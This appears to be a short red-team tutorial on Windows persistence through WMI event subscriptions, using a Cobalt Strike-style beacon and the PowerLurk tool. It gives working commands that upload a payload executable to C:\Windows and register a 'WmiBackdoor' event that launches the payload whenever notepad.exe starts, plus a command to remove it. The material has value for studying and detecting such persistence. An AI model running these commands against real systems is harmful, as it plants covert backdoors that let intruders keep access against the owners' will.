Requirements

High integrity or SYSTEM

In order to maintain persistence through WMI, we need three classes:

  1. EventConsumer: An action (i.e. execute payload—PowerShell, VBScript, etc)
  2. EventFilter: A filter that defines what event to act on
  3. FilterToConsumerBinding: Links an EventConsumer to EventFilter

We can build these WMI classes uses PowerLurk.

Demonstration

beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

You can view these classes afterwards using Get-WmiEvent -Name WmiBackdoor. The CommandLineTemplate for the EventConsumer will simply be C:\Windows\dns_x64.exe; and query for the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'.

To remove the backdoor:

Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject